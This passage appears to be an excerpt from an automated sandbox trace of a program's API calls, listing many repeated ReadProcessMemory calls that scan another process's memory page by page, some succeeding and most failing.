lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.169] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x48000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.169] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x49000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.169] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x4a000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.170] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x4b000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.170] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x4c000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.170] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x4d000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.172] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x4e000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.172] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x4f000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.172] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x50000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.173] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x51000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.173] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x52000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.173] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x53000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.173] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x54000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.174] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x55000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.174] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x56000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.174] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x57000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.175] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x58000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.175] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x59000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.175] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x5a000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.175] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x5b000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.175] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x5c000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.176] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x5d000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.176] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x5e000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.176] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x5f000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.176] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x60000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.177] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x61000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.177] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x62000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.177] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x63000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.177] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x64000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.178] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x65000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.179] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x66000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.180] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x67000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.180] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x68000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.180] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x69000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.180] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x6a000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.181] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x6b000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.181] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x6c000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.181] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x6d000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.181] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x6e000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.182] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x6f000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.182] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x70000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.182] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x71000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.183] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x72000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.183] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x73000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.183] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x74000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.184] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x75000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.184] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x76000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.184] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x77000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.185] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x78000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.185] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x79000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.185] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x7a000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.186] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x7b000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.186] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x7c000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.186] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x7d000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.186] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x7e000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.187] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x7f000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.187] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x80000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.187] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x81000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.188] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x82000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.188] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x83000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.188] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x84000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.189] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x85000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.189] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x86000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.189] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x87000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.189] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x88000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.190] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x89000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.190] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x8a000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.190] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x8b000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.190] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x8c000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.191] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x8d000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.191] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x8e000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.191] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x8f000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.191] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x90000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.192] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x91000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.195] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x92000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.195] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x93000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.195] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x94000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.196] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x95000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.196] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x96000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.196] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x97000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.196] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x98000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.197] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x99000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.197] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x9a000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.197] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x9b000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.198] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x9c000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.198] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x9d000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.198] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x9e000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.198] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x9f000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.198] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xa0000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.199] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xa1000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.199] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xa2000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.199] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xa3000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.199] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xa4000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.200] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xa5000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.200] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xa6000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.200] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xa7000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.200] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xa8000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.200] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xa9000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.201] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xaa000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.201] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xab000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.201] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xac000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.201] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xad000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.202] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xae000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.202] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xaf000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.202] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xb0000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.203] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xb1000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.203] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xb2000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.203] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xb3000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.203] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xb4000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.203] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xb5000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.204] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xb6000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.204] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xb7000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.204] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xb8000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.205] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xb9000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.205] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xba000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.205] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xbb000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.205] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xbc000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.206] ReadProcessMemory (in: 